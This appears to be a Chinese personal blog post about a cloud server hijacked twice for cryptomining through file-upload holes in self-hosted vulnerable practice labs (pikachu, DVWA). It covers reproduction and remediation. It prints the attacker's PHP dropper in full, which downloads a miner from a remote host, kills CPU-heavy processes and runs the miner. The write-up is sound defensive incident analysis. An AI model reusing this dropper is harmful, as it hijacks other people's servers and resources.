服务器被入侵记录二则
前言
注:原创文章,禁止转载!
之前闲着没事在阿里云用docker部署了三个老靶场,分别是sqli,dvwa,pikachu,方便他人使用学习
阿里云的警报
2021.6.10,阿里云给我发了一个短信提醒我疑似服务器被入侵,有挖矿行为
我想着难道是ssh爆破?难道之前安装的fail2ban服务失效了,上线一看,运行着,首先排除ssh爆破。
然后仔细回想了一下,也没有安装什么存在漏洞的版本的服务啊。
登陆了阿里云控制台,看到如下信息:
(上面的容器名是piakchu,是因为我重命名的时候打快了打错了,然后懒得命名回来了)
果然是靶场惹的祸,直接通过pikachu靶场文件上传漏洞getshell然后运行挖矿文件。
在我的固化思维里,docker容器与宿主机分离,还是相对安全的,你get了pikachu的shell也无所谓,之前也去了解过docker容器的逃逸,但是我的版本是没有逃逸的那个漏洞的,然后我就没有管它了。虽然不会被轻易渗透到宿主机,但是还是没想到会有人利用我的靶场来挖矿。
复现
为了弄清楚究竟是怎么一回事,随后去做了一个复现,这里用虚拟机做的:
docker拉的pikachu
通过pikachu的上传漏洞获取shell,上传的文件在宿主机以下目录:
/var/lib/docker/volumes/1fbe430ca6daba2068c719273fb0af52dd5b756b900b2957357bd3e0316cfe57/_data/vul/unsafeupload/uploads
通过蚁剑连接
ll查看权限(我的虚拟机是有icey这个普通用户的):
-rw-r--r--. 1 icey ftp 53 Jun 14 16:30 aa.php
-rwxr-xr-x. 1 icey ftp 19 Jun 14 16:37 sillage.sh
再ll查看uploads目录的权限,是有执行权限的
执行whoami,为www-data,只有对/var/www目录的管理权:
可以运行一些脚本,但无法逸出容器对宿主机实行攻击(或许是我功力不够,有兴趣的读者可以自行折腾)
随后将uploads目录的执行权限去掉,通过蚁剑仍然能连接,但是已经无法执行脚本了
阿里云的警报又来了
2021.6.21,这天又收到了警报,有了之前的经验,也在我意料之中了
直接top命令查看,占用cpu资源最高的那个进程名tomcat就是挖矿程序,文件名是tomcat
几乎不用想,我就知道来自dvwa靶场的文件上传,被人getshell,然后运行了挖矿文件
我直接停掉了dvwa靶场,top再查看,tomcat进程也跟着没了
随后一波操作来到了dvwa靶场的上传目录:
[root@iZhp3661jqu8od84z9g4f8Z 08c916061cde7dbcbcb5b215d45e76e9ec3ed3cad8987ebbe519f0f8a8a8d34a]# find / -name tomcat
/etc/selinux/targeted/active/modules/100/tomcat
/var/lib/docker/overlay2/4fb773a023fedfefad7d586d7c118fb1468f109d4b4c531b46f475a608f553d8/diff/app/hackable/uploads/tomcat
与之前不同的是,这里不仅有tomcat挖矿文件,还有一个d.php,和config.json的文件
d.php内容如下:
<?php
file_put_contents("tomcat", file_get_contents("http://XXXX.16:8088/public/controls/dhtmlx/skins/web/tomcat"));
file_put_contents("config.json", file_get_contents("http://XXXX.16:8088/public/controls/dhtmlx/skins/web/config.json"));
$x=system("ps axf -o 'pid %cpu' | awk '{if($2>=80) print $1}'");
system("kill -9 ".$x);
system('ps -aux');
system('chmod +x tomcat');
system('./tomcat');
system('rm -fr d.php')
虽然没怎么学过php,但上面的命令还是能看懂大部分,最后一句是删除d.php,但是为什么没删除掉自身呢,我猜可能是括号后面少写了一个分号
里面留下了hacker的远程ip,来自中国河南,当时就来精神了,准备一波反*,第一步信息搜集,访问其web服务我就愣住了,这怎么看也不像是个私人的云服务器。这可能是个。。。
然后就关电脑睡觉了。
处理
最后呢把dvwa和pikachu靶场做了处理,首先建立docker数据卷(docker volume create pikachu),映射到相应容器(docker run -d -it --name=pikachu -p 9002:80 -v pikachu:/app area39/pikachu),方便管理,其次对靶场的上传目录修改权限,去除执行权限(chmod -R a-x uploads),我是直接生硬去除了所有用户的在该目录的执行权限,然后查看靶场,发现文件上传部分直接被搞废了,不能上传,提示权限有问题:
这样也好,省得他们是折腾了。
后续
又再次警报有挖矿行为了,然后登陆一看,还是那个tomcat文件,不过换了个目录
/var/lib/docker/overlay2/3e3bfa4512a96826be672049b29031b1df6c8bf7f86573045914e7719f335efc/diff/tmp
于是直接把tmp目录的执行权限去掉,chmod -R a-x tmp
后来的后来,我关掉了靶场。本来就是靶场,全身的洞,补完就不叫靶场了。
反思
不要有固化思维
文件的权限管理要精准把控,不给不法之人可乘之机
